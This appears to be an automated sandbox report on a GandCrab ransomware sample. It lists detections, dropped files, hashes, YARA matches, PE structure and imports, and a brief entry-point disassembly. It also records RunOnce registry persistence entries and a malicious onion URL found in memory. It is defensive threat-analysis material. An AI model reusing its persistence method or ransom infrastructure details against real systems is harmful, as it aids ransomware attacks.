IJr8RvvhZ3.exe	86%	Metadefender		Browse
IJr8RvvhZ3.exe	96%	ReversingLabs	Win32.Ransomware.GandCrab
IJr8RvvhZ3.exe	100%	Avira	TR/Dropper.Gen
IJr8RvvhZ3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
25.3.mqsmvj.exe.3490000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.3.mqsmvj.exe.3790000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
27.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
30.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.0.IJr8RvvhZ3.exe.f140000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
34.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
39.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
38.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
36.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
23.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
28.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
19.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
35.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.3.mqsmvj.exe.32b0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
16.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
28.3.mqsmvj.exe.3130000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
16.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
35.3.mqsmvj.exe.3970000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
19.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
23.3.mqsmvj.exe.3a70000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
19.3.mqsmvj.exe.3930000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
15.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
39.3.mqsmvj.exe.2fb0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
38.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
11.3.mqsmvj.exe.3290000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
37.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
26.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
11.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
39.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
26.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
16.3.mqsmvj.exe.3b50000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
27.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
30.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
3.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.3.mqsmvj.exe.2fb0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
28.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
34.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
36.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
23.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
35.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
30.3.mqsmvj.exe.3470000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
37.3.mqsmvj.exe.3bc0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.IJr8RvvhZ3.exe.3210000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
27.3.mqsmvj.exe.3490000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
37.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.0.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.2.mqsmvj.exe.f580000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5	100%	Avira URL Cloud	malware
https://tox.chat/download.html	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipv4bot.whatismyipaddress.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ipv4bot.whatismyipaddress.com/a	mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.torproject.org/	IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/$	mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/4	mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/CwX	mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5	IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	true	Avira URL Cloud: malware	unknown
http://ipv4bot.whatismyipaddress.com/9I)	mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/I	mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/	mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tox.chat/download.html	IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	694560
Start date and time:	2022-08-31 23:50:56 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IJr8RvvhZ3.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@21/1@15/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99% (good quality ratio 95.1%) Quality average: 83% Quality standard deviation: 24.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 72 Number of non-executed functions: 96
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:52:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:52:12	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:52:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:52:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:52:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:52:49	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:53:04	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:53:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:53:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:53:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:53:40	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:53:49	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:54:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:54:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:54:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:54:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:54:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:54:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:55:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
23:55:12	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Download File

Process:	C:\Users\user\Desktop\IJr8RvvhZ3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	6.490172186221231
Encrypted:	false
SSDEEP:	1536:VZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:Ed5BJHMqqDL2/Ovvdr
MD5:	937D3395BC50812DBAB14034E2FCC25B
SHA1:	DB221BDAAE201CD4CD39EC97CE6FA933DA9FACFB
SHA-256:	B34EF0C18F05108E829F41196C84E5A9C93FBB4C03D61CF42BB277AC1D1A7ABA
SHA-512:	02EFC4F8FBAEF139B392AE60F8678CBCC1C84761F80CBA3642DCF519D06B1FF63D1499917B8A50424F6EAF54E6141D513DB1D2D42730EED4192BB0EC1D7A546D
Malicious:	true
Yara Hits:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This (..X..m cannot be run in DOS mode....$....................}.....B.....B...........1.......Y...G.....~.....y.....\|....Rich...................PE..L....6.Z............................ K.......................................Z....... ....@.........................P...U............@.......................P.......................................................................................text...H........................... ..`.rdata..&q.......r..................@..@.data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.4901978767924895
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IJr8RvvhZ3.exe
File size:	71680
MD5:	b77359bc85030f5f856b8010c0ddf6a8
SHA1:	5bff219a3d20203a239a23db69385f2611e67f5d
SHA256:	afd36e5d309ba8576b7e6a31ab1b3af4c3c0530052a2c31b97c688c0e2515005
SHA512:	c0dc63351d03b120a3b20b31596c0d4235fa4ef4d8228d01450486f73226cc40ab357d5050a24e51c4783cfc55f005e59d8fb8e73644beae0590554a3efbe829
SSDEEP:	1536:sZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:zd5BJHMqqDL2/Ovvdr
TLSH:	1A636C1DB2D1B293F1E396B9FAB57E25445D2D103B056BEB08A369F568120F16C3B703
File Content Preview:	MZ......................@...............................................!..L.!This ......m cannot be run in DOS mode....$.........................}.......B.......B...............1.........Y.....G.......~.......y.......\|.....Rich....................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x10004b20
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH
Time Stamp:	0x5A9C3687 [Sun Mar 4 18:10:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8735e6cad23590d9b5b60978db488a28

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 4Ch
push 000003E8h
call dword ptr [1000A098h]
call 00007FD018C883BFh
test eax, eax
je 00007FD018C8872Ah
push 00000000h
call dword ptr [1000A168h]
push 00000000h
push 00000000h
push 00000000h
push 10002D30h
push 00000000h
push 00000000h
call dword ptr [1000A108h]
mov dword ptr [ebp-04h], eax
cmp dword ptr [ebp-04h], 00000000h
je 00007FD018C8874Eh
push 00001388h
mov eax, dword ptr [ebp-04h]
push eax
call dword ptr [1000A080h]
cmp eax, 00000102h
jne 00007FD018C8872Eh
push 00000000h
mov ecx, dword ptr [ebp-04h]
push ecx
call dword ptr [1000A094h]
mov edx, dword ptr [ebp-04h]
push edx
call dword ptr [1000A10Ch]
call 00007FD018C88454h
call 00007FD018C87E3Fh
lea ecx, dword ptr [ebp-4Ch]
call 00007FD018C8A0D7h
mov dword ptr [ebp-24h], 00000000h
mov dword ptr [ebp-20h], 00000000h
mov dword ptr [ebp-18h], 00000000h
mov dword ptr [ebp-28h], 00000000h
lea eax, dword ptr [ebp-20h]
push eax
lea ecx, dword ptr [ebp-24h]
push ecx
lea edx, dword ptr [ebp-28h]
push edx
lea eax, dword ptr [ebp-18h]
push eax
lea ecx, dword ptr [ebp-4Ch]
call 00007FD018C8A053h
mov dword ptr [ebp-2Ch], 00000000h
mov dword ptr [ebp-0Ch], 00000000h
mov ecx, dword ptr [ebp-18h]
call 00007FD018C8863Dh

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[EXP] VS2013 build 21005
[RES] VS2013 build 21005
[LNK] VS2013 build 21005

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x10550	0x55	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x105a8	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0xaf4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x200	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8448	0x8600	False	0.4546991604477612	data	6.32052618210059	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x7126	0x7200	False	0.47765899122807015	data	6.1644872822657275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x12000	0xa84	0xc00	False	0.3056640625	data	3.538638851099626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x13000	0x4	0x200	False	0.033203125	data	0.04078075625387198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1e0	0x200	False	0.52734375	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15000	0xaf4	0xc00	False	0.7932942708333334	data	6.537931848954439	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x14060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	ReadFile, SetFilePointer, GetFileAttributesW, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
USER32.dll	BeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, wsprintfA, GetForegroundWindow, SetWindowLongW
GDI32.dll	TextOutW
ADVAPI32.dll	FreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
SHELL32.dll	ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
CRYPT32.dll	CryptStringToBinaryA, CryptBinaryToStringA
WININET.dll	InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
PSAPI.DLL	EnumDeviceDrivers, GetDeviceDriverBaseNameW

Exports

Name	Ordinal	Address
_ReflectiveLoader@0	1	0x10005ff0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

